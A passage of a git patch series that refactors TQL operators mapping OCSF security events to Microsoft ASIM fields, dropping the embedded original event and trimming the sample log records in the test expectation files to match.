microsoft/operators/asim/ocsf/dhcp_activity.tql | 3 +-- microsoft/operators/asim/ocsf/dns_activity.tql | 3 +-- microsoft/operators/asim/ocsf/entity_management.tql | 3 +-- microsoft/operators/asim/ocsf/event_log_activity.tql | 3 +-- microsoft/operators/asim/ocsf/file_system_activity.tql | 3 +-- microsoft/operators/asim/ocsf/group_management.tql | 3 +-- microsoft/operators/asim/ocsf/http_activity.tql | 3 +-- microsoft/operators/asim/ocsf/network_activity.tql | 3 +-- microsoft/operators/asim/ocsf/process_activity.tql | 3 +-- microsoft/operators/asim/ocsf/scheduled_job_activity.tql | 3 +-- microsoft/operators/asim/ocsf/windows_service_activity.tql | 3 +-- microsoft/operators/graph/ocsf/map.tql | 3 +-- 17 files changed, 17 insertions(+), 34 deletions(-) diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql index 0b7d201..72cde7e 100644 --- a/microsoft/operators/asim/ocsf/account_change.tql +++ b/microsoft/operators/asim/ocsf/account_change.tql @@ -51,5 +51,4 @@ asim.GroupIdType = "SID" if asim.GroupId?.starts_with("S-") == true asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql index aae1000..ae1689b 100644 --- a/microsoft/operators/asim/ocsf/authentication.tql +++ b/microsoft/operators/asim/ocsf/authentication.tql @@ -64,5 +64,4 @@ if ocsf.auth_factors? != null { asim.LogonMethod = ocsf.auth_factors[0]?.factor_type? } -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql index ce2a78e..ea29d0f 100644 --- a/microsoft/operators/asim/ocsf/authorize_session.tql +++ b/microsoft/operators/asim/ocsf/authorize_session.tql @@ -61,5 +61,4 @@ if ocsf.auth_factors? != null { asim.LogonMethod = ocsf.auth_factors[0]?.factor_type? } -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index 4a0a5b0..d1c417c 100644 --- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -46,5 +46,4 @@ match ocsf.verdict? { _ => {} } -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index b061cee..a3e8638 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -61,5 +61,4 @@ match ocsf.verdict? { _ => {} } -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql index d785bc4..1792b44 100644 --- a/microsoft/operators/asim/ocsf/dhcp_activity.tql +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql @@ -26,5 +26,4 @@ asim.SrcHostname = ocsf.src_endpoint?.hostname? else ocsf.src_endpoint?.ip?.stri asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcMacAddr = ocsf.src_endpoint?.mac? -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql index b523a92..bfb874d 100644 --- a/microsoft/operators/asim/ocsf/dns_activity.tql +++ b/microsoft/operators/asim/ocsf/dns_activity.tql @@ -31,5 +31,4 @@ asim.SrcHostname = ocsf.src_endpoint?.hostname? asim.DstIpAddr = ocsf.dst_endpoint?.ip? asim.DstHostname = ocsf.dst_endpoint?.hostname? -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index 4fb8972..f4aadfc 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql @@ -45,5 +45,4 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index b2ed048..7698e69 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -45,5 +45,4 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index 7a62c1a..69390a9 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql @@ -41,5 +41,4 @@ if ocsf.activity_name == "Rename" and ocsf.file_result? != null { } asim.TargetFilePathType = "Windows Local" if asim.TargetFilePath?.contains("\\") == true else "Unix Local" -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index 67b7eae..0f0c71e 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql @@ -47,5 +47,4 @@ asim.GroupIdType = "SID" if asim.GroupId?.starts_with("S-") == true asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql index c418c51..461ccc2 100644 --- a/microsoft/operators/asim/ocsf/http_activity.tql +++ b/microsoft/operators/asim/ocsf/http_activity.tql @@ -24,5 +24,4 @@ if ocsf.http_response?.code? != null { asim.EventResult = "Success" if ocsf.http_response.code < 400 else "Failure" } -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql index 9174575..c6b23a6 100644 --- a/microsoft/operators/asim/ocsf/network_activity.tql +++ b/microsoft/operators/asim/ocsf/network_activity.tql @@ -39,5 +39,4 @@ match ocsf.disposition? { _ => {} } -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index 48212e1..fc0c6c9 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql @@ -35,5 +35,4 @@ asim.TargetProcessName = ocsf.process?.name? else ocsf.process?.file?.name? else asim.TargetProcessCommandLine = ocsf.process?.cmd_line? asim.TargetUserId = ocsf.user?.uid? -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index f77cdf2..387760e 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql @@ -45,5 +45,4 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql index 5cecccb..e765ef7 100644 --- a/microsoft/operators/asim/ocsf/windows_service_activity.tql +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql @@ -45,5 +45,4 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -$event = {...asim, AdditionalFields: ocsf} -drop ocsf?, asim? +$event = {...move asim, AdditionalFields: move ocsf} diff --git a/microsoft/operators/graph/ocsf/map.tql b/microsoft/operators/graph/ocsf/map.tql index 1cb726f..58e34e7 100644 --- a/microsoft/operators/graph/ocsf/map.tql +++ b/microsoft/operators/graph/ocsf/map.tql @@ -69,5 +69,4 @@ match @name { } } -$event = {...ocsf, unmapped: graph} -drop graph?, ocsf? +$event = {...move ocsf, unmapped: move graph} From 005a9ae76dee2a78564be0dddeb3bc381c36449f Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Thu, 11 Jun 2026 18:34:03 +0200 Subject: [PATCH 23/27] Stop embedding OCSF events in ASIM output Emit only the mapped ASIM fields from OCSF-to-ASIM operators. Callers that need to retain the OCSF event can duplicate or copy it before invoking the ASIM mapper. Assisted-by: GPT-5 (Codex) --- .../unreleased/ocsf-to-asim-mapper.md | 3 +- .../operators/asim/ocsf/account_change.tql | 2 +- .../operators/asim/ocsf/authentication.tql | 2 +- .../operators/asim/ocsf/authorize_session.tql | 2 +- .../asim/ocsf/compliance_finding.tql | 2 +- .../operators/asim/ocsf/detection_finding.tql | 2 +- .../operators/asim/ocsf/dhcp_activity.tql | 2 +- .../operators/asim/ocsf/dns_activity.tql | 2 +- .../operators/asim/ocsf/entity_management.tql | 2 +- .../asim/ocsf/event_log_activity.tql | 2 +- .../asim/ocsf/file_system_activity.tql | 2 +- .../operators/asim/ocsf/group_management.tql | 2 +- .../operators/asim/ocsf/http_activity.tql | 2 +- .../operators/asim/ocsf/network_activity.tql | 2 +- .../operators/asim/ocsf/process_activity.tql | 2 +- .../asim/ocsf/scheduled_job_activity.tql | 2 +- .../asim/ocsf/windows_service_activity.tql | 2 +- microsoft/tests/asim/graph.txt | 90 ----------- microsoft/tests/asim/ocsf.txt | 32 ---- microsoft/tests/asim/ocsf/account_change.txt | 39 ----- microsoft/tests/asim/ocsf/authentication.txt | 153 ------------------ .../tests/asim/ocsf/detection_finding.txt | 58 ------- microsoft/tests/asim/ocsf/dhcp_activity.txt | 27 ---- microsoft/tests/asim/ocsf/dns_activity.txt | 31 ---- .../tests/asim/ocsf/event_log_activity.txt | 42 ----- .../tests/asim/ocsf/file_system_activity.txt | 66 -------- .../tests/asim/ocsf/group_management.txt | 43 ----- microsoft/tests/asim/ocsf/http_activity.txt | 31 ---- .../tests/asim/ocsf/network_activity.txt | 34 ---- .../tests/asim/ocsf/process_activity.txt | 58 ------- microsoft/tests/asim/windows.tql | 1 - microsoft/tests/asim/windows.txt | 99 ------------ 32 files changed, 17 insertions(+), 822 deletions(-) diff --git a/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md index 68e1d23..cca3728 100644 --- a/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md +++ b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md @@ -25,5 +25,4 @@ preserved in OCSF `raw_data` and `raw_data_size`. The mapper covers the Microsoft package's current OCSF authentication, process, audit, user-management, and alert outputs, plus direct OCSF counterparts for -file, network, DNS, DHCP, and web session ASIM schemas. The full original OCSF -event is preserved under `AdditionalFields` so no source data is lost. +file, network, DNS, DHCP, and web session ASIM schemas. diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql index 72cde7e..d58c398 100644 --- a/microsoft/operators/asim/ocsf/account_change.tql +++ b/microsoft/operators/asim/ocsf/account_change.tql @@ -51,4 +51,4 @@ asim.GroupIdType = "SID" if asim.GroupId?.starts_with("S-") == true asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql index ae1689b..dadfca1 100644 --- a/microsoft/operators/asim/ocsf/authentication.tql +++ b/microsoft/operators/asim/ocsf/authentication.tql @@ -64,4 +64,4 @@ if ocsf.auth_factors? != null { asim.LogonMethod = ocsf.auth_factors[0]?.factor_type? } -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql index ea29d0f..ac4537a 100644 --- a/microsoft/operators/asim/ocsf/authorize_session.tql +++ b/microsoft/operators/asim/ocsf/authorize_session.tql @@ -61,4 +61,4 @@ if ocsf.auth_factors? != null { asim.LogonMethod = ocsf.auth_factors[0]?.factor_type? } -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index d1c417c..c392f25 100644 --- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -46,4 +46,4 @@ match ocsf.verdict? { _ => {} } -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index a3e8638..4fc1a17 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -61,4 +61,4 @@ match ocsf.verdict? { _ => {} } -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql index 1792b44..5b8b90a 100644 --- a/microsoft/operators/asim/ocsf/dhcp_activity.tql +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql @@ -26,4 +26,4 @@ asim.SrcHostname = ocsf.src_endpoint?.hostname? else ocsf.src_endpoint?.ip?.stri asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcMacAddr = ocsf.src_endpoint?.mac? -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql index bfb874d..b96d045 100644 --- a/microsoft/operators/asim/ocsf/dns_activity.tql +++ b/microsoft/operators/asim/ocsf/dns_activity.tql @@ -31,4 +31,4 @@ asim.SrcHostname = ocsf.src_endpoint?.hostname? asim.DstIpAddr = ocsf.dst_endpoint?.ip? asim.DstHostname = ocsf.dst_endpoint?.hostname? -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index f4aadfc..01aae60 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql @@ -45,4 +45,4 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index 7698e69..cd93063 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -45,4 +45,4 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index 69390a9..198c644 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql @@ -41,4 +41,4 @@ if ocsf.activity_name == "Rename" and ocsf.file_result? != null { } asim.TargetFilePathType = "Windows Local" if asim.TargetFilePath?.contains("\\") == true else "Unix Local" -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index 0f0c71e..696296e 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql @@ -47,4 +47,4 @@ asim.GroupIdType = "SID" if asim.GroupId?.starts_with("S-") == true asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql index 461ccc2..a8bde76 100644 --- a/microsoft/operators/asim/ocsf/http_activity.tql +++ b/microsoft/operators/asim/ocsf/http_activity.tql @@ -24,4 +24,4 @@ if ocsf.http_response?.code? != null { asim.EventResult = "Success" if ocsf.http_response.code < 400 else "Failure" } -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql index c6b23a6..8bc833f 100644 --- a/microsoft/operators/asim/ocsf/network_activity.tql +++ b/microsoft/operators/asim/ocsf/network_activity.tql @@ -39,4 +39,4 @@ match ocsf.disposition? { _ => {} } -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index fc0c6c9..8294f0a 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql @@ -35,4 +35,4 @@ asim.TargetProcessName = ocsf.process?.name? else ocsf.process?.file?.name? else asim.TargetProcessCommandLine = ocsf.process?.cmd_line? asim.TargetUserId = ocsf.user?.uid? -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index 387760e..731782f 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql @@ -45,4 +45,4 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql index e765ef7..6c02cd3 100644 --- a/microsoft/operators/asim/ocsf/windows_service_activity.tql +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql @@ -45,4 +45,4 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -$event = {...move asim, AdditionalFields: move ocsf} +$event = move asim diff --git a/microsoft/tests/asim/graph.txt b/microsoft/tests/asim/graph.txt index 1ac2942..9d435e0 100644 --- a/microsoft/tests/asim/graph.txt +++ b/microsoft/tests/asim/graph.txt @@ -36,95 +36,5 @@ TargetAppName: "Office 365", LogonProtocol: null, LogonMethod: "Push Notification", - AdditionalFields: { - action: "Allowed", - action_id: 1, - activity_id: 1, - activity_name: "Logon", - actor: { - user: { - domain: "example.com", - email_addr: "alice@example.com", - full_name: "Alice Example", - name: "alice", - type: "User", - type_id: 1, - uid: "user-1", - }, - }, - auth_factors: [ - { - factor_type: "Push Notification", - factor_type_id: 5, - }, - ], - category_name: "Identity & Access Management", - category_uid: 3, - class_name: "Authentication", - class_uid: 3002, - cloud: { - provider: "Azure", - }, - disposition: "Allowed", - disposition_id: 1, - dst_endpoint: { - svc_name: "Microsoft Graph", - uid: "resource-1", - }, - is_mfa: true, - is_remote: true, - logon_type: "interactiveUser", - logon_type_id: 99, - metadata: { - log_name: "auditLogs/signIns", - original_event_uid: "sign-in-1", - product: { - feature: { - name: "Microsoft Graph", - }, - name: "Microsoft Entra ID", - vendor_name: "Microsoft", - }, - profiles: [ - "cloud", - "security_control", - ], - version: "1.8.0", - }, - service: { - name: "Office 365", - uid: "app-1", - }, - severity: "Informational", - severity_id: 1, - src_endpoint: { - ip: 203.0.113.10, - location: { - city: "Berlin", - country: "DE", - }, - os: { - name: "Windows 11", - }, - uid: "device-1", - }, - status: "Success", - status_code: "0", - status_detail: "Other.", - status_id: 1, - time: 2026-05-01T10:00:00Z, - type_name: "Authentication: Logon", - type_uid: 300201, - unmapped: null, - user: { - domain: "example.com", - email_addr: "alice@example.com", - full_name: "Alice Example", - name: "alice", - type: "User", - type_id: 1, - uid: "user-1", - }, - }, name: "asim.authentication", } diff --git a/microsoft/tests/asim/ocsf.txt b/microsoft/tests/asim/ocsf.txt index 5670818..63ed92b 100644 --- a/microsoft/tests/asim/ocsf.txt +++ b/microsoft/tests/asim/ocsf.txt @@ -24,37 +24,5 @@ SrcHostname: null, DstIpAddr: null, DstHostname: null, - AdditionalFields: { - activity_id: 1, - activity_name: "Query", - category_uid: 4, - class_uid: 4003, - class_name: "DNS Activity", - type_uid: 400301, - type_name: "DNS Activity: Query", - time: 2026-01-01T00:00:02Z, - severity_id: 1, - status: "Success", - rcode: "NA", - metadata: { - original_event_uid: "dns-1", - product: { - name: "DNS", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "dns1", - }, - query: { - hostname: "example.org", - type: "A", - class: "IN", - }, - src_endpoint: { - ip: 10.0.0.1, - }, - }, name: "asim.dns", } diff --git a/microsoft/tests/asim/ocsf/account_change.txt b/microsoft/tests/asim/ocsf/account_change.txt index c1220d0..93f39fa 100644 --- a/microsoft/tests/asim/ocsf/account_change.txt +++ b/microsoft/tests/asim/ocsf/account_change.txt @@ -28,44 +28,5 @@ GroupIdType: null, SrcIpAddr: null, SrcHostname: null, - AdditionalFields: { - activity_id: 1, - activity_name: "Create", - category_uid: 3, - category_name: "Identity & Access Management", - class_uid: 3001, - class_name: "Account Change", - type_uid: 300101, - type_name: "Account Change: Create", - time: 2024-03-23T12:34:56.789012300Z, - severity_id: 1, - metadata: { - event_code: "4720", - original_event_uid: "98767", - product: { - name: "Microsoft-Windows-Security-Auditing", - vendor_name: "Microsoft", - }, - profiles: [ - "host", - ], - version: "1.8.0", - }, - device: { - hostname: "DC01.corp.local", - }, - actor: { - user: { - domain: "CORP", - name: "jdoe", - uid: "S-1-5-21-3107921522-2185401913-891411500-1104", - }, - }, - user: { - domain: "CORP", - name: "backdoor_svc", - uid: "S-1-5-21-3107921522-2185401913-891411500-1500", - }, - }, name: "asim.user_management", } diff --git a/microsoft/tests/asim/ocsf/authentication.txt b/microsoft/tests/asim/ocsf/authentication.txt index 49d599f..c70b478 100644 --- a/microsoft/tests/asim/ocsf/authentication.txt +++ b/microsoft/tests/asim/ocsf/authentication.txt @@ -35,56 +35,6 @@ TargetAppId: null, TargetAppName: null, LogonProtocol: "Kerberos", - AdditionalFields: { - activity_id: 1, - activity_name: "Logon", - category_uid: 3, - category_name: "Identity & Access Management", - class_uid: 3002, - class_name: "Authentication", - type_uid: 300201, - type_name: "Authentication: Logon", - time: 2024-03-23T12:34:56.789012300Z, - severity_id: 1, - severity: "Informational", - status_id: 1, - status: "Success", - auth_protocol: "Kerberos", - logon_type: "Network", - logon_type_id: 3, - metadata: { - event_code: "4624", - original_event_uid: "98761", - product: { - name: "Microsoft-Windows-Security-Auditing", - vendor_name: "Microsoft", - }, - profiles: [ - "host", - ], - version: "1.8.0", - }, - device: { - hostname: "DC01.corp.local", - }, - src_endpoint: { - ip: 10.0.0.42, - port: 49827, - }, - actor: { - user: { - uid: "S-1-0-0", - }, - session: { - uid_alt: "0x0", - }, - }, - user: { - domain: "CORP", - name: "jdoe", - uid: "S-1-5-21-3107921522-2185401913-891411500-1104", - }, - }, name: "asim.authentication", } { @@ -122,41 +72,6 @@ TargetAppId: null, TargetAppName: null, LogonProtocol: null, - AdditionalFields: { - activity_id: 2, - activity_name: "Logoff", - category_uid: 3, - category_name: "Identity & Access Management", - class_uid: 3002, - class_name: "Authentication", - type_uid: 300202, - type_name: "Authentication: Logoff", - time: 2024-03-23T12:45:00Z, - severity_id: 1, - severity: "Informational", - status_id: 1, - status: "Success", - metadata: { - event_code: "4634", - original_event_uid: "98762", - product: { - name: "Microsoft-Windows-Security-Auditing", - vendor_name: "Microsoft", - }, - profiles: [ - "host", - ], - version: "1.8.0", - }, - device: { - hostname: "DC01.corp.local", - }, - user: { - domain: "CORP", - name: "jdoe", - uid: "S-1-5-21-3107921522-2185401913-891411500-1104", - }, - }, name: "asim.authentication", } { @@ -194,73 +109,5 @@ TargetAppName: "Office 365", LogonProtocol: null, LogonMethod: "Push Notification", - AdditionalFields: { - activity_id: 1, - activity_name: "Logon", - category_uid: 3, - category_name: "Identity & Access Management", - class_uid: 3002, - class_name: "Authentication", - type_uid: 300201, - type_name: "Authentication: Logon", - time: 2026-05-01T10:00:00Z, - severity_id: 1, - severity: "Informational", - status_id: 1, - status: "Success", - metadata: { - log_name: "auditLogs/signIns", - original_event_uid: "sign-in-1", - product: { - name: "Microsoft Entra ID", - vendor_name: "Microsoft", - feature: { - name: "Microsoft Graph", - }, - }, - profiles: [ - "cloud", - "security_control", - ], - version: "1.8.0", - }, - cloud: { - provider: "Azure", - }, - actor: { - user: { - domain: "example.com", - email_addr: "alice@example.com", - full_name: "Alice Example", - name: "alice", - uid: "user-1", - }, - }, - user: { - domain: "example.com", - email_addr: "alice@example.com", - full_name: "Alice Example", - name: "alice", - uid: "user-1", - }, - src_endpoint: { - ip: 203.0.113.10, - uid: "device-1", - }, - dst_endpoint: { - svc_name: "Microsoft Graph", - uid: "resource-1", - }, - service: { - name: "Office 365", - uid: "app-1", - }, - auth_factors: [ - { - factor_type: "Push Notification", - factor_type_id: 5, - }, - ], - }, name: "asim.authentication", } diff --git a/microsoft/tests/asim/ocsf/detection_finding.txt b/microsoft/tests/asim/ocsf/detection_finding.txt index cdcba4e..88b18f2 100644 --- a/microsoft/tests/asim/ocsf/detection_finding.txt +++ b/microsoft/tests/asim/ocsf/detection_finding.txt @@ -25,63 +25,5 @@ AlertStatus: "Active", AlertOriginalStatus: "New", AlertVerdict: "True Positive", - AdditionalFields: { - activity_id: 1, - activity_name: "Create", - attacks: [ - { - technique: { - uid: "T1059", - }, - }, - ], - category_uid: 2, - category_name: "Findings", - class_uid: 2004, - class_name: "Detection Finding", - type_uid: 200401, - type_name: "Detection Finding: Create", - time: 2026-05-01T10:10:00Z, - end_time: 2026-05-01T10:12:00Z, - severity_id: 4, - severity: "High", - status_id: 1, - status: "New", - verdict: "True Positive", - metadata: { - log_name: "security/alerts_v2", - original_event_uid: "alert-1", - product: { - name: "Microsoft Defender", - vendor_name: "Microsoft", - feature: { - name: "Microsoft Graph", - }, - }, - profiles: [ - "cloud", - "incident", - "security_control", - ], - tenant_uid: "11111111-1111-1111-1111-111111111111", - version: "1.8.0", - }, - cloud: { - provider: "Azure", - }, - finding_info: { - uid: "alert-1", - title: "Suspicious PowerShell", - desc: "PowerShell launched with suspicious arguments.", - types: [ - "malware", - ], - }, - malware: [ - { - name: "Trojan", - }, - ], - }, name: "asim.alert_event", } diff --git a/microsoft/tests/asim/ocsf/dhcp_activity.txt b/microsoft/tests/asim/ocsf/dhcp_activity.txt index 180e62e..4cc2b13 100644 --- a/microsoft/tests/asim/ocsf/dhcp_activity.txt +++ b/microsoft/tests/asim/ocsf/dhcp_activity.txt @@ -18,32 +18,5 @@ SrcHostname: "client1", SrcIpAddr: 10.0.0.50, SrcMacAddr: "00:11:22:33:44:55", - AdditionalFields: { - activity_id: 5, - activity_name: "Ack", - category_uid: 4, - class_uid: 4004, - class_name: "DHCP Activity", - type_uid: 400405, - time: 2026-01-01T00:00:03Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "dhcp-1", - product: { - name: "DHCP", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "dhcp1", - }, - src_endpoint: { - hostname: "client1", - ip: 10.0.0.50, - mac: "00:11:22:33:44:55", - }, - }, name: "asim.dhcp_event", } diff --git a/microsoft/tests/asim/ocsf/dns_activity.txt b/microsoft/tests/asim/ocsf/dns_activity.txt index 6d4567a..63ed92b 100644 --- a/microsoft/tests/asim/ocsf/dns_activity.txt +++ b/microsoft/tests/asim/ocsf/dns_activity.txt @@ -24,36 